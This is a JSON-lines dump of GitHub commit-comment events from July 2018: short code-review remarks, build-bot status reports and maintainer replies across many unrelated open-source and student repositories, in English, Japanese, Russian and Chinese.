{"id":"7954831541","type":"CommitCommentEvent","actor":{"login":"GovindKalyanaMOJ"},"repo":{"name":"Pareis2/PareisPractise"},"payload":{"comment":{"id":29682076,"position":10,"line":10,"path":"src/Assignment2/EmployeeMap.java","commit_id":"a97cb3d18bf0f1a51c4dda84f6c3cba02772f2c8","created_at":"2018-07-12T08:49:52Z","updated_at":"2018-07-12T08:49:52Z","author_association":"COLLABORATOR","body":"As said do not implement anything on the main method exception calling the existing methods.\r\nWhere is the init method defined ?"}},"created_at":"2018-07-12T08:49:52Z"}
{"id":"7954833797","type":"CommitCommentEvent","actor":{"login":"aboudard"},"repo":{"name":"aboudard/intro"},"payload":{"comment":{"id":29682082,"position":null,"line":null,"path":null,"commit_id":"987cb0e8663b3770967f63785ab440291ad9c0d2","created_at":"2018-07-12T08:50:18Z","updated_at":"2018-07-12T08:50:18Z","author_association":"OWNER","body":"comment on a commit"}},"created_at":"2018-07-12T08:50:18Z"}
{"id":"7954840487","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29682095,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T08:51:31Z","updated_at":"2018-07-12T08:51:31Z","author_association":"MEMBER","body":"Ok, many things you said doesn't make sense. \n> This is using two test commands rather than one, which is why I didn't use it in the first place. The original way was using only one test call.\n\nI fixed this in the second commit.\n\n> This isn't working on Kali at all, the xterm is as small as it can get.\n\nTested on Debian and arch Linux run perfect we could restore this but using ENV variables in in my option better. With the the shopt command these get updated.\n\n> These aren't clearing the screen, which causes the banner to scroll by, and I think the banner look silly in the middle of the screen.\n\nThis is also a \"bug\" which I can't confirm. Clear do the same thing it only prints a control sequence like in our case printf. This should lead to the exact same result.\n\n"}},"created_at":"2018-07-12T08:51:31Z"}
{"id":"7954843732","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29682102,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T08:52:09Z","updated_at":"2018-07-12T08:52:09Z","author_association":"MEMBER","body":"Looks like your terminal doesn't support that"}},"created_at":"2018-07-12T08:52:09Z"}
{"id":"7954845550","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29682105,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T08:52:28Z","updated_at":"2018-07-12T08:52:28Z","author_association":"MEMBER","body":"Looks like your terminal doesn't support that"}},"created_at":"2018-07-12T08:52:28Z"}
{"id":"7954845881","type":"CommitCommentEvent","actor":{"login":"samsmith94"},"repo":{"name":"green-fox-academy/Zoznyak"},"payload":{"comment":{"id":29682106,"position":136,"line":136,"path":"STM32Cube_FW_F7_V1.11.0/Projects/STM32746G-Discovery/GreenFox/digital_dynamo/Src/main.c","commit_id":"9f5b8bdc2e8d2e781256b1080f78e8643b9ed375","created_at":"2018-07-12T08:52:32Z","updated_at":"2018-07-12T08:52:32Z","author_association":"NONE","body":"HAL_NVIC_Enable?"}},"created_at":"2018-07-12T08:52:32Z"}
{"id":"7954850087","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29682113,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-12T08:53:19Z","updated_at":"2018-07-12T08:53:19Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2306 of 2306 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.16%25-green.png)</a>\n"}},"created_at":"2018-07-12T08:53:19Z"}
{"id":"7954851841","type":"CommitCommentEvent","actor":{"login":"shreyasalunke"},"repo":{"name":"shreyasalunke/Hello-World"},"payload":{"comment":{"id":29682116,"position":null,"line":null,"path":null,"commit_id":"1c0e4f5ba38e13f769026c396e124c95048e553a","created_at":"2018-07-12T08:53:38Z","updated_at":"2018-07-12T08:53:38Z","author_association":"OWNER","body":"hie,\r\nthis is a practice session for me to know abt Git "}},"created_at":"2018-07-12T08:53:38Z"}
{"id":"7954852727","type":"CommitCommentEvent","actor":{"login":"walk4think"},"repo":{"name":"ugolb/san_user_auth_service"},"payload":{"comment":{"id":29682118,"position":13,"line":13,"path":"src/main/java/sanduku/san_user_auth_service/models/UserAuthModel.java","commit_id":"fbe29e72238f3ec8a11e99a5e143e143dc2e4125","created_at":"2018-07-12T08:53:47Z","updated_at":"2018-07-12T08:53:47Z","author_association":"NONE","body":"Why min=5? IMHO, min = 1 should be enough."}},"created_at":"2018-07-12T08:53:47Z"}
{"id":"7954854023","type":"CommitCommentEvent","actor":{"login":"mumoshu"},"repo":{"name":"mfmmiyano/kube-aws"},"payload":{"comment":{"id":29682121,"position":25,"line":436,"path":"core/root/config/templates/cluster.yaml","commit_id":"bfb7cb504b13e37826c5f51f2aed974658effad0","created_at":"2018-07-12T08:54:01Z","updated_at":"2018-07-12T08:54:01Z","author_association":"NONE","body":"よさそうなor推奨されているデフォルト値ってありますか？(50%とか？"}},"created_at":"2018-07-12T08:54:01Z"}
{"id":"7954857003","type":"CommitCommentEvent","actor":{"login":"mumoshu"},"repo":{"name":"mfmmiyano/kube-aws"},"payload":{"comment":{"id":29682124,"position":31,"line":442,"path":"core/root/config/templates/cluster.yaml","commit_id":"bfb7cb504b13e37826c5f51f2aed974658effad0","created_at":"2018-07-12T08:54:34Z","updated_at":"2018-07-12T08:54:34Z","author_association":"NONE","body":"`# See <URL> for available options`みたいな感じで設定可能な値のリストへリンクをはるとわかりやすいかもです！"}},"created_at":"2018-07-12T08:54:34Z"}
{"id":"7954857238","type":"CommitCommentEvent","actor":{"login":"kochedykov"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29682125,"position":14,"line":37,"path":"src/com/invertor/modbus/net/ModbusMasterConnectionTCP.java","commit_id":"e3e8779d7730936fdaeb3dcbd53f4b39a46e3412","created_at":"2018-07-12T08:54:37Z","updated_at":"2018-07-12T08:54:37Z","author_association":"OWNER","body":"I removed the `public` modifier because there is no sense for accessing `ModbusMasterConnectionTCP` out of `net` package. `ModbusSlaveConnectionTCP` is used for retrieving information about connected tcp-client (`ModbusSlaveConnectionTCP.getClientInfo`)."}},"created_at":"2018-07-12T08:54:37Z"}
{"id":"7954857619","type":"CommitCommentEvent","actor":{"login":"deltaxflux"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29682127,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-12T08:54:41Z","updated_at":"2018-07-12T08:54:41Z","author_association":"MEMBER","body":"Looks like your terminal doesn't support that. Ah and returning negative values in bash doesn't make sense either. Return uses values from 0-255 and the hole return -1 doesn't make sense in bash. Sure other programs could return negative values."}},"created_at":"2018-07-12T08:54:41Z"}
{"id":"7954857780","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29682128,"position":null,"line":null,"path":null,"commit_id":"b8163aa823feb21ab3f3d5e46330cd3d569fd75c","created_at":"2018-07-12T08:54:42Z","updated_at":"2018-07-12T08:54:42Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8163aa823feb21ab3f3d5e46330cd3d569fd75c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T08:54:42Z"}
{"id":"7954858790","type":"CommitCommentEvent","actor":{"login":"davidglezz"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29682130,"position":9,"line":120,"path":"themes/classic/modules/contactform/views/templates/widget/contactform.tpl","commit_id":"ccb6989fb28a931d6e0141ce6559148ca404bb0e","created_at":"2018-07-12T08:54:53Z","updated_at":"2018-07-12T08:54:53Z","author_association":"NONE","body":"why do you use type=text and use css to hide it? it would be better to use type=hidden."}},"created_at":"2018-07-12T08:54:53Z"}
{"id":"7954860203","type":"CommitCommentEvent","actor":{"login":"walk4think"},"repo":{"name":"ugolb/san_user_auth_service"},"payload":{"comment":{"id":29682133,"position":21,"line":21,"path":"src/main/java/sanduku/san_user_auth_service/models/UserAuthModel.java","commit_id":"fbe29e72238f3ec8a11e99a5e143e143dc2e4125","created_at":"2018-07-12T08:55:09Z","updated_at":"2018-07-12T08:55:09Z","author_association":"NONE","body":"Standart pass RQ is >=8. May be min = 8 will be better."}},"created_at":"2018-07-12T08:55:09Z"}
{"id":"7954867083","type":"CommitCommentEvent","actor":{"login":"mumoshu"},"repo":{"name":"mfmmiyano/kube-aws"},"payload":{"comment":{"id":29682145,"position":25,"line":436,"path":"core/root/config/templates/cluster.yaml","commit_id":"bfb7cb504b13e37826c5f51f2aed974658effad0","created_at":"2018-07-12T08:56:21Z","updated_at":"2018-07-12T08:56:21Z","author_association":"NONE","body":"あ、それか、ASGベースのnode poolと併用する前提であれば、これは100でも問題なさそうですね"}},"created_at":"2018-07-12T08:56:21Z"}
{"id":"7954868160","type":"CommitCommentEvent","actor":{"login":"aab-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29682154,"position":null,"line":null,"path":null,"commit_id":"00712ab777556b7db590cb7652dbbb7b87751833","created_at":"2018-07-12T08:56:33Z","updated_at":"2018-07-12T08:56:33Z","author_association":"NONE","body":"Slightly reworked... What do you think @kebeclibre ?\r\n:belgium: "}},"created_at":"2018-07-12T08:56:33Z"}
{"id":"7954873173","type":"CommitCommentEvent","actor":{"login":"jaimeperez"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29682165,"position":null,"line":null,"path":null,"commit_id":"540f2c971460d7c91ee95ddfc98fdfbd31183125","created_at":"2018-07-12T08:57:26Z","updated_at":"2018-07-12T08:57:26Z","author_association":"MEMBER","body":"Tim, can you verify there are no other typos like this in the rest of the code? I'm kind of busy right now fixing an issue we have with signature validation being broken in 1.16.x..."}},"created_at":"2018-07-12T08:57:26Z"}
{"id":"7954879904","type":"CommitCommentEvent","actor":{"login":"aboudard"},"repo":{"name":"aboudard/intro"},"payload":{"comment":{"id":29682175,"position":null,"line":null,"path":null,"commit_id":"987cb0e8663b3770967f63785ab440291ad9c0d2","created_at":"2018-07-12T08:58:40Z","updated_at":"2018-07-12T08:58:40Z","author_association":"OWNER","body":"another comment"}},"created_at":"2018-07-12T08:58:40Z"}
{"id":"7954880009","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29682177,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T08:58:41Z","updated_at":"2018-07-12T08:58:41Z","author_association":"OWNER","body":"@Awzaw @Thunder33345 Thanks for contacting me about the rejecting reason, I will try to add that feature to the plugin, but I need a list of all API Changes that changed from the previous release (3.0.0-ALPHA12) which I can't unfortunately find.\n\nThanks."}},"created_at":"2018-07-12T08:58:41Z"}
{"id":"7954885391","type":"CommitCommentEvent","actor":{"login":"thib3113"},"repo":{"name":"danielzzz/node-ping"},"payload":{"comment":{"id":29682190,"position":null,"line":null,"path":null,"commit_id":"e478c164390a438cfabcd376a32c36d31bb3ecf0","created_at":"2018-07-12T08:59:36Z","updated_at":"2018-07-12T08:59:36Z","author_association":"CONTRIBUTOR","body":"@mondwan can you push it to npmjs please ? ( I'm waiting it to update another repo )"}},"created_at":"2018-07-12T08:59:36Z"}
{"id":"7954886850","type":"CommitCommentEvent","actor":{"login":"ugolb"},"repo":{"name":"ugolb/san_user_auth_service"},"payload":{"comment":{"id":29682192,"position":21,"line":21,"path":"src/main/java/sanduku/san_user_auth_service/models/UserAuthModel.java","commit_id":"fbe29e72238f3ec8a11e99a5e143e143dc2e4125","created_at":"2018-07-12T08:59:53Z","updated_at":"2018-07-12T08:59:53Z","author_association":"OWNER","body":"It was just for test, the user model it is still point to discuss. All\nvalues ther is just for test.\n\nчт, 12 июл. 2018 г., 10:55 walk4think <notifications@github.com>:\n\n> Standart pass RQ is >=8. May be min = 8 will be better.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ugolb/san_user_auth_service/commit/fbe29e72238f3ec8a11e99a5e143e143dc2e4125#commitcomment-29682133>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOOvXIziBqgfkSvA-CRHbTCScS2w6n54ks5uFw7ugaJpZM4VMdLb>\n> .\n>\n"}},"created_at":"2018-07-12T08:59:53Z"}
{"id":"7954886999","type":"CommitCommentEvent","actor":{"login":"vakarianplay"},"repo":{"name":"vakarianplay/vakarianplay.github.io"},"payload":{"comment":{"id":29682193,"position":null,"line":null,"path":null,"commit_id":"5342c7c61950970545db31abdcf09ae4a73e7294","created_at":"2018-07-12T08:59:54Z","updated_at":"2018-07-12T08:59:54Z","author_association":"OWNER","body":"No new tab"}},"created_at":"2018-07-12T08:59:54Z"}
{"id":"7954894921","type":"CommitCommentEvent","actor":{"login":"sunding009"},"repo":{"name":"sunding009/django16"},"payload":{"comment":{"id":29682211,"position":null,"line":null,"path":null,"commit_id":"c2fc7c89f29f1e8eb783b76c980547a255f0a235","created_at":"2018-07-12T09:01:16Z","updated_at":"2018-07-12T09:01:16Z","author_association":"OWNER","body":"2.2.2 定义数据模型"}},"created_at":"2018-07-12T09:01:16Z"}
{"id":"7954897613","type":"CommitCommentEvent","actor":{"login":"Patechoc"},"repo":{"name":"Patechoc/GCP_memo"},"payload":{"comment":{"id":29682217,"position":null,"line":null,"path":null,"commit_id":"d90e5b16822afc73c0abbe11b17e61f4dee5e322","created_at":"2018-07-12T09:01:44Z","updated_at":"2018-07-12T09:01:44Z","author_association":"OWNER","body":"https://codelabs.developers.google.com/codelabs/cpb101-bigquery-query/"}},"created_at":"2018-07-12T09:01:44Z"}
{"id":"7954901867","type":"CommitCommentEvent","actor":{"login":"jukkar"},"repo":{"name":"jyong2/zephyr"},"payload":{"comment":{"id":29682224,"position":1,"line":192,"path":"drivers/ethernet/eth_native_posix.c","commit_id":"d472c282643f12d7063bc1cb175b445a8738f3eb","created_at":"2018-07-12T09:02:27Z","updated_at":"2018-07-12T09:02:27Z","author_association":"NONE","body":"Please change the commit subject to \"net: eth: Convert to use callbacks to query stats\""}},"created_at":"2018-07-12T09:02:27Z"}
{"id":"7954905640","type":"CommitCommentEvent","actor":{"login":"mumoshu"},"repo":{"name":"mfmmiyano/kube-aws"},"payload":{"comment":{"id":29682232,"position":66,"line":96,"path":"core/nodepool/config/templates/stack-template.json","commit_id":"bfb7cb504b13e37826c5f51f2aed974658effad0","created_at":"2018-07-12T09:03:08Z","updated_at":"2018-07-12T09:03:08Z","author_association":"NONE","body":"ここは複数指定できないとSpotinstによる「SpotだけどAvailabiityが高い」という特徴が行かせない気がしました（？）\r\nもしそうだとしたら、`elastiGroup.spotInstanceTypes`みたいyaml arrayで複数指定できるといいかもですね"}},"created_at":"2018-07-12T09:03:08Z"}
{"id":"7954906497","type":"CommitCommentEvent","actor":{"login":"jukkar"},"repo":{"name":"jyong2/zephyr"},"payload":{"comment":{"id":29682234,"position":60,"line":452,"path":"drivers/ethernet/eth_native_posix.c","commit_id":"d472c282643f12d7063bc1cb175b445a8738f3eb","created_at":"2018-07-12T09:03:17Z","updated_at":"2018-07-12T09:03:17Z","author_association":"NONE","body":"Add empty line before return statement so that it is easier to read the code."}},"created_at":"2018-07-12T09:03:17Z"}
{"id":"7954908199","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29682239,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T09:03:35Z","updated_at":"2018-07-12T09:03:35Z","author_association":"OWNER","body":"@Thunder33345 Thanks I will remember that"}},"created_at":"2018-07-12T09:03:35Z"}
{"id":"7954910539","type":"CommitCommentEvent","actor":{"login":"Skyflash"},"repo":{"name":"Skyflash/skyflash.github.io"},"payload":{"comment":{"id":29682248,"position":null,"line":null,"path":null,"commit_id":"ee826ab56e1a693262fe25393ed7c63a92ce9ccc","created_at":"2018-07-12T09:04:01Z","updated_at":"2018-07-12T09:04:01Z","author_association":"OWNER","body":"Thanks to @vedantpuri for the particles implementation 👍 "}},"created_at":"2018-07-12T09:04:01Z"}
{"id":"7954913621","type":"CommitCommentEvent","actor":{"login":"me-no-dev"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29682253,"position":null,"line":null,"path":null,"commit_id":"2fe965259a74480dcf7bfaede95769f495ccba4e","created_at":"2018-07-12T09:04:34Z","updated_at":"2018-07-12T09:04:34Z","author_association":"MEMBER","body":"SPI1 is defined as the base struct to control SPI1 bus (defined in IDF) so having this basically redefines it and breaks SPI."}},"created_at":"2018-07-12T09:04:34Z"}
{"id":"7954918171","type":"CommitCommentEvent","actor":{"login":"stof"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":29682259,"position":4,"line":4,"path":".github/CODEOWNERS","commit_id":"8c62ecfad2001fe062559fd4a2f8893c31500411","created_at":"2018-07-12T09:05:22Z","updated_at":"2018-07-12T09:05:22Z","author_association":"MEMBER","body":"@dunglas shouldn't @nicolas-grekas be the code owner there ?"}},"created_at":"2018-07-12T09:05:22Z"}
{"id":"7954924157","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29682267,"position":65,"line":47,"path":"src/main/java/abc/University.java","commit_id":"b47857448e48eff5e8d29ac20012341cd06faf97","created_at":"2018-07-12T09:06:27Z","updated_at":"2018-07-12T09:06:27Z","author_association":"COLLABORATOR","body":"Why number of faculties and specialties are put from different places? "}},"created_at":"2018-07-12T09:06:27Z"}
{"id":"7954926206","type":"CommitCommentEvent","actor":{"login":"mumoshu"},"repo":{"name":"mfmmiyano/kube-aws"},"payload":{"comment":{"id":29682271,"position":141,"line":171,"path":"core/nodepool/config/templates/stack-template.json","commit_id":"bfb7cb504b13e37826c5f51f2aed974658effad0","created_at":"2018-07-12T09:06:51Z","updated_at":"2018-07-12T09:06:51Z","author_association":"NONE","body":"これはASGを[cluster-autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)でオートスケールさせるための指示という役割を話すタグなのですが、cluster-autoscalerはElastigroupのスケールに対応していません。なので、if-endまで省いてしまったほうがよさそう？と思いました"}},"created_at":"2018-07-12T09:06:51Z"}
{"id":"7954929466","type":"CommitCommentEvent","actor":{"login":"cloudde"},"repo":{"name":"cloudde/wajopp"},"payload":{"comment":{"id":29682283,"position":17,"line":17,"path":"editor-style.css","commit_id":"954c3240d961eb4686e84d3f0f5af09b4e59b15a","created_at":"2018-07-12T09:07:27Z","updated_at":"2018-07-12T09:07:27Z","author_association":"OWNER","body":"i changed this"}},"created_at":"2018-07-12T09:07:27Z"}
{"id":"7954932451","type":"CommitCommentEvent","actor":{"login":"ferjm"},"repo":{"name":"ceyusa/media"},"payload":{"comment":{"id":29682294,"position":16,"line":38,"path":"servo-media/Cargo.toml","commit_id":"81ad89df7ae9fea5e266382daae8aeb5b364e95f","created_at":"2018-07-12T09:08:00Z","updated_at":"2018-07-12T09:08:00Z","author_association":"NONE","body":"We need to set a version here."}},"created_at":"2018-07-12T09:08:00Z"}
{"id":"7954933063","type":"CommitCommentEvent","actor":{"login":"mumoshu"},"repo":{"name":"mfmmiyano/kube-aws"},"payload":{"comment":{"id":29682296,"position":90,"line":120,"path":"core/nodepool/config/templates/stack-template.json","commit_id":"bfb7cb504b13e37826c5f51f2aed974658effad0","created_at":"2018-07-12T09:08:07Z","updated_at":"2018-07-12T09:08:07Z","author_association":"NONE","body":"ALBやNLBにつなぐためのTarget Groupsの指定は可能でしたでしょうか・・？（可能だとしたら、typeがCLASSIC以外になる？でもここはtargert groupsじゃなくてloadBalancersだからまた別かな"}},"created_at":"2018-07-12T09:08:07Z"}
{"id":"7954937591","type":"CommitCommentEvent","actor":{"login":"paxarpp"},"repo":{"name":"cavy24/React-Redux"},"payload":{"comment":{"id":29682301,"position":18,"line":18,"path":"React-Redux/src/app/actions/CommentActions.js","commit_id":"8cd3dcd1b0af54caca275269c1c9b77abc306ee8","created_at":"2018-07-12T09:08:55Z","updated_at":"2018-07-12T09:08:55Z","author_association":"NONE","body":"не оставляйте пустых не нужных строчек"}},"created_at":"2018-07-12T09:08:55Z"}
{"id":"7954938649","type":"CommitCommentEvent","actor":{"login":"ferjm"},"repo":{"name":"ceyusa/media"},"payload":{"comment":{"id":29682305,"position":33,"line":54,"path":"servo-media/Cargo.toml","commit_id":"81ad89df7ae9fea5e266382daae8aeb5b364e95f","created_at":"2018-07-12T09:09:08Z","updated_at":"2018-07-12T09:09:08Z","author_association":"NONE","body":"Isn't glib already a gstreamer dependency? If that's the case, I don't think we need to add it here again."}},"created_at":"2018-07-12T09:09:08Z"}
{"id":"7954941895","type":"CommitCommentEvent","actor":{"login":"paxarpp"},"repo":{"name":"cavy24/React-Redux"},"payload":{"comment":{"id":29682311,"position":30,"line":30,"path":"React-Redux/src/app.jsx","commit_id":"8cd3dcd1b0af54caca275269c1c9b77abc306ee8","created_at":"2018-07-12T09:09:43Z","updated_at":"2018-07-12T09:09:43Z","author_association":"NONE","body":"удаляйте пустые строки"}},"created_at":"2018-07-12T09:09:43Z"}
{"id":"7954945514","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29682317,"position":82,"line":52,"path":"src/main/java/abc/University.java","commit_id":"b47857448e48eff5e8d29ac20012341cd06faf97","created_at":"2018-07-12T09:10:22Z","updated_at":"2018-07-12T09:10:22Z","author_association":"COLLABORATOR","body":"why do you print students, but as parameter take university? "}},"created_at":"2018-07-12T09:10:22Z"}
{"id":"7954947323","type":"CommitCommentEvent","actor":{"login":"xian165"},"repo":{"name":"xian165/helloword"},"payload":{"comment":{"id":29682320,"position":null,"line":null,"path":null,"commit_id":"c494b449fd7794cce6994a71420cbe92c9ade2ee","created_at":"2018-07-12T09:10:44Z","updated_at":"2018-07-12T09:10:44Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-12T09:10:44Z"}
{"id":"7954949112","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29682322,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T09:11:05Z","updated_at":"2018-07-12T09:11:05Z","author_association":"OWNER","body":"@Thunder33345\nThanks I already Know that, but I thought the reject reason was because I included a versions in releasing form that isn't in the plugin"}},"created_at":"2018-07-12T09:11:05Z"}
{"id":"7954949218","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29682324,"position":82,"line":52,"path":"src/main/java/abc/University.java","commit_id":"b47857448e48eff5e8d29ac20012341cd06faf97","created_at":"2018-07-12T09:11:06Z","updated_at":"2018-07-12T09:11:06Z","author_association":"COLLABORATOR","body":"Do you really need this method?"}},"created_at":"2018-07-12T09:11:06Z"}
{"id":"7954950095","type":"CommitCommentEvent","actor":{"login":"Xavier-Do"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29682327,"position":21,"line":93,"path":"addons/mail/wizard/mail_resend_message.py","commit_id":"62591c58f8abded96b5fedcc4d9760550b7bdf18","created_at":"2018-07-12T09:11:16Z","updated_at":"2018-07-12T09:11:16Z","author_association":"CONTRIBUTOR","body":"Oops, forgot to remove that, todo\r\n"}},"created_at":"2018-07-12T09:11:16Z"}
{"id":"7954951380","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/trezor-agent"},"payload":{"comment":{"id":29682330,"position":null,"line":null,"path":null,"commit_id":"03e7fc48e9569dd3528c4b392ef7ba912f33307f","created_at":"2018-07-12T09:11:30Z","updated_at":"2018-07-12T09:11:30Z","author_association":"OWNER","body":"Following #254 "}},"created_at":"2018-07-12T09:11:30Z"}
{"id":"7954954448","type":"CommitCommentEvent","actor":{"login":"ferjm"},"repo":{"name":"ceyusa/media"},"payload":{"comment":{"id":29682335,"position":33,"line":54,"path":"servo-media/Cargo.toml","commit_id":"81ad89df7ae9fea5e266382daae8aeb5b364e95f","created_at":"2018-07-12T09:12:04Z","updated_at":"2018-07-12T09:12:04Z","author_association":"NONE","body":"We are using `serde` and `ipc-channel` outside of the `gst` backend, so we should have that dependency not only for the `gst` feature.\r\n\r\nIn any case, with https://github.com/servo/media/pull/84 this all changes a little bit."}},"created_at":"2018-07-12T09:12:04Z"}
{"id":"7954959277","type":"CommitCommentEvent","actor":{"login":"seadexexchange"},"repo":{"name":"seadex-exchange/API"},"payload":{"comment":{"id":29682342,"position":4,"line":8,"path":"README.md","commit_id":"0cb2764a33c165731e5102dd100b2d01a7a31c8a","created_at":"2018-07-12T09:12:55Z","updated_at":"2018-07-12T09:12:55Z","author_association":"CONTRIBUTOR","body":"aaaaassssssyyu"}},"created_at":"2018-07-12T09:12:55Z"}
{"id":"7954959473","type":"CommitCommentEvent","actor":{"login":"bahia0019"},"repo":{"name":"bahia0019/flaunt-sites-core"},"payload":{"comment":{"id":29682343,"position":null,"line":null,"path":null,"commit_id":"5dcfcfdbf7c3b946eca9067bedd61236dbf88558","created_at":"2018-07-12T09:12:57Z","updated_at":"2018-07-12T09:12:57Z","author_association":"OWNER","body":"This is a change to the Readme file."}},"created_at":"2018-07-12T09:12:57Z"}
{"id":"7954963017","type":"CommitCommentEvent","actor":{"login":"narugit"},"repo":{"name":"SENSlab/senslab.github.io"},"payload":{"comment":{"id":29682347,"position":null,"line":null,"path":null,"commit_id":"f341ea75c58ed53211a69eb4de8a99ee7c8eed58","created_at":"2018-07-12T09:13:36Z","updated_at":"2018-07-12T09:13:36Z","author_association":"MEMBER","body":"great photos 👍 "}},"created_at":"2018-07-12T09:13:36Z"}
{"id":"7954969668","type":"CommitCommentEvent","actor":{"login":"gedge"},"repo":{"name":"ONSdigital/go-ns"},"payload":{"comment":{"id":29682354,"position":72,"line":60,"path":"audit/helper.go","commit_id":"6d7e9cb49c63b48ed23e57a8c22efb97d11a9f5a","created_at":"2018-07-12T09:14:51Z","updated_at":"2018-07-12T09:14:51Z","author_association":"CONTRIBUTOR","body":"delete this cruft?"}},"created_at":"2018-07-12T09:14:51Z"}
{"id":"7954969972","type":"CommitCommentEvent","actor":{"login":"mifl"},"repo":{"name":"bq/aquaris-U-Plus"},"payload":{"comment":{"id":29682355,"position":null,"line":null,"path":null,"commit_id":"f44c3e1ff2208d82f683c4526efed2f7776cf5b3","created_at":"2018-07-12T09:14:54Z","updated_at":"2018-07-12T09:14:54Z","author_association":"NONE","body":"In drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c\r\nThe lines 945 to 949 must be removed. To clarify this, can see the commit:\r\nhttps://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=add9c95f647fee4102b671832307f1cb157c5386"}},"created_at":"2018-07-12T09:14:54Z"}
